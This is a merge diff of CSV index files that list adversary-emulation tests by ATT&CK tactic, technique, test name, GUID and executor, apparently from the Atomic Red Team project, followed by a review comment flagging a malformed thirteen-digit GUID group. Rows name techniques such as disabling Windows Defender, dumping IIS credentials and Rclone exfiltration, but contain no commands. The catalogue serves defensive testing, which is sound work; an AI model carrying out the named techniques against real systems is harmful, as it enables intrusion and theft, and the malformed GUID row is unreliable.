Merge branch 'master' into am_t1547006_kextload
@@ -327,6 +327,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Bl
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
|
||||
@@ -385,6 +386,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch
|
||||
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
|
||||
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
|
||||
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
|
||||
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
|
||||
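Review bot: The GUID on the `AWS - CloudWatch Log Stream Deletes` row (test 8 of T1562.008) is malformed: its final group `802bb11d06121` has thirteen hex digits where a UUID has twelve, so the value is 37 characters and any consumer that validates the id or selects tests by GUID will fail to match it. Whether this row is context or part of the change is not recoverable from the rendered section, so it may predate this merge. If this index CSV is generated from the atomic YAML, the correction belongs in the source test definition and this file should be regenerated; the row should carry a 36-character UUID such as `89422c87-b57b-4a04-a12a-<12 hex digits, placeholder>`. The neighbouring test 9 row uses a well-formed id, so the two rows can be checked against each other when regenerating.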
@@ -477,6 +479,9 @@ privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
@@ -527,9 +532,11 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
|
||||
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
|
||||
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
|
||||
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
|
||||
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
|
||||
@@ -566,6 +573,8 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a sys
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
|
||||
@@ -715,6 +724,9 @@ persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
|
||||
@@ -767,11 +779,13 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
|
||||
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
|
||||
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
|
||||
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
|
||||
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
|
||||
@@ -810,6 +824,8 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Servic
|
||||
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
|
||||
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
|
||||
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
|
||||
@@ -942,6 +958,8 @@ credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User
|
||||
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
|
||||
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
|
||||
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
|
||||
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
|
||||
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
|
||||
@@ -961,11 +979,13 @@ credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump indivi
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
|
||||
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
|
||||
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
|
||||
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
|
||||
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
|
||||
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
|
||||
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
|
||||
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
|
||||
@@ -1135,11 +1155,13 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
|
||||
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
|
||||
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
|
||||
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
|
||||
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
|
||||
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
|
||||
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
|
||||
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
|
||||
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
|
||||
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
|
||||
@@ -1407,3 +1429,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
|
||||
@@ -86,6 +86,7 @@ persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-
|
||||
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
|
||||
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
|
||||
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
@@ -108,6 +109,7 @@ privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injecti
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
|
||||
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
@@ -120,7 +122,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
|
||||
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
|
||||
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
|
||||
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
|
||||
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
|
||||
@@ -140,7 +144,9 @@ discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user
|
||||
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
|
||||
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
|
||||
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
|
||||
@@ -247,6 +247,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Bl
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
|
||||
@@ -288,6 +289,7 @@ defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd
|
||||
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
|
||||
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
|
||||
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
|
||||
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
|
||||
@@ -358,6 +360,9 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
